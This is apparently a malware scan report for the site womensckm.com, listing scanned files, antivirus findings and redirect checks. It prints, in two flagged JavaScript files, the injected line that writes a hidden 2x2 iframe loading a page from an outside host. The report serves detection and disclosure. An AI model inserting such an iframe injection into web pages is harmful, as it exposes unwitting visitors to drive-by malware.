Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=womensckm.com
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://womensckm.com/ | 200 OK Content-Length: 60835 Content-Type: text/html | clean |
http://womensckm.com/AC_RunActiveContent.js | 200 OK Content-Length: 8193 Content-Type: application/x-javascript | malicious |
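Malicious code - confirmed by antiviruses (see below). The flagged statement is shown first: it writes a 2x2-pixel iframe, sourced from a host other than the scanned site, into the page that loads this script. A truncated excerpt of the rest of the file follows it.
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://adottareadistanza.org/chof.html?j=614581></iframe>');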
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; case "vspace": case "hspace": case "class": case "title": case "accesskey": case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; }
Antivirus reports:
Hidden iFrame found. Size: 2x2; src: http://adottareadistanza.org/chof.html?j=614581
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://adottareadistanza.org/chof.html?j=614581>
http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js | 200 OK Content-Length: 55740 Content-Type: text/javascript | clean |
http://womensckm.com/jqueryslidemenu.js | 200 OK Content-Length: 2555 Content-Type: application/x-javascript | malicious |
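Malicious code - confirmed by antiviruses (see below). The flagged statement is shown first: it is the same 2x2-pixel iframe injection reported for AC_RunActiveContent.js. A truncated excerpt of the rest of the file follows it.
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://adottareadistanza.org/chof.html?j=614581></iframe>');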
var arrowimages={down:['downarrowclass', 'down.gif', 23], right:['rightarrowclass', 'right.gif']} var jqueryslidemenu={ animateduration: {over: 200, out: 100}, buildmenu:function(menuid, arrowsvar){ jQuery(document).ready(function($){ var $mainmenu=$("#"+menuid+">ul") var $headers= if ($targetul.queue().length<=1) $targetul.css({left:menuleft+"px", width:this._dimensions.subulw+'px'}).slideDown(jqueryslidemenu.animateduration.over) }, function(e){ var $targetul=$(this).children("ul:eq(0)") $targetul.slideUp(jqueryslidemenu.animateduration.out) } ) }) $mainmenu.find("ul").css({display:'none', visibility:'visible'}) }) } } jqueryslidemenu.buildmenu("myslidemenu", arrowimages)
Antivirus reports:
Hidden iFrame found. Size: 2x2; src: http://adottareadistanza.org/chof.html?j=614581
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://adottareadistanza.org/chof.html?j=614581>
http://www.womensckm.com/fpss/engines/jquery-comp.js | 200 OK Content-Length: 29846 Content-Type: application/x-javascript | clean |
http://www.womensckm.com/fpss/engines/jquery-fpss-comp.js | 200 OK Content-Length: 2854 Content-Type: application/x-javascript | clean |
http://millerusa.net/637953.js | 404 Not Found Content-Length: 9 Content-Type: text/html | clean |
http://millerusa.net/test404page.js | 404 Not Found Content-Length: 9 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: womensckm.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 21:00:54 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
GET / HTTP/1.1
Host: womensckm.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 21:00:54 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Second query (visit from search engine):
GET / HTTP/1.1
Host: womensckm.com
Referer: http://www.google.com/search?q=womensckm.com
Result:
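The result is similar to the first query. No suspicious redirects were found. This check covers only HTTP-level redirects for the two requests shown; it does not clear the site, because the hidden iframe reported under "Scanned pages/files" is delivered inside the site's own JavaScript files rather than by a redirect.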
GET / HTTP/1.1
Host: womensckm.com
Referer: http://www.google.com/search?q=womensckm.com
Result:
The result is similar to the first query. There are no suspicious redirects found.